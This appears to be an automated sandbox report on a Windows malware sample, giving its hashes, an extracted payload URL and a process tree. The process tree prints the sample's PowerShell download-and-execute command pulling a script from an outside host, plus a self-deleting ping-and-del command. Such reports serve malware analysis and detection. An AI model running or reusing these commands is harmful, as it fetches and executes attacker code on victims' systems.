Analysis
-
max time kernel
1s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
13-10-2023 02:20
Static task
static1
Behavioral task
behavioral1
Sample
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe
Resource
win10v2004-20230915-en
General
-
Target
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe
-
Size
247KB
-
MD5
f17afa21e88b7a362db5ae8fdfa43de9
-
SHA1
14b024dfe1f9aa6eb88bc7e2215e4877c92cc01e
-
SHA256
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf
-
SHA512
efbdcd1c0fb91cb15de2935ed500fb0f9a8b3ef1491e9823850e97451348cd3a170bc0ad3c84086438508f7280f100a33ff8299a7de64093129b2d7ea83b8e0d
-
SSDEEP
3072:98iTSP3d1hp5xnAs03vx54qylRs8crPGjl5mS3qI79TPJvLCw8DSmfNKgAiNNrc4:90zl37r79h2DSm1SgAOmhzN+
Malware Config
Extracted
https://aszfiltration.com/storage/files/debug2.ps1
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.execmd.exedescription pid process target process PID 1924 wrote to memory of 2188 1924 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe cmd.exe PID 1924 wrote to memory of 2188 1924 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe cmd.exe PID 1924 wrote to memory of 2188 1924 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe cmd.exe PID 1924 wrote to memory of 2188 1924 c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe cmd.exe PID 2188 wrote to memory of 1312 2188 cmd.exe powershell.exe PID 2188 wrote to memory of 1312 2188 cmd.exe powershell.exe PID 2188 wrote to memory of 1312 2188 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe"C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')"2⤵
- Suspicious use of WriteProcessMemory
PID:2188
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf_JC.exe" >> NUL2⤵PID:2516
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2624
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')1⤵PID:1312